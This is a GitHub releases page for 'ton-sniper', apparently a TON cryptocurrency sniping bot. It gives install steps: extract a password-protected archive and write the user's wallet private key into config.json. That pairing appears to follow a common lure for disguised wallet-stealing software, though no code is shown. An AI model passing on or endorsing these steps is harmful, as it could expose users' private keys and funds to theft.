Releases: knightlightst/ton-sniper
Releases · knightlightst/ton-sniper
Ton-Sniper-1.1
Installation
- Download the repository.
- Extract archive with pass
Io1K2
. - Create a
config.json
file. - Run the bot.
Config.json
{
"NodeUrl": "https://main.ton.dev",
"PrivateKey": "your_private_key",
"TargetAddress": "target_address",
"TargetAmount": 1000
}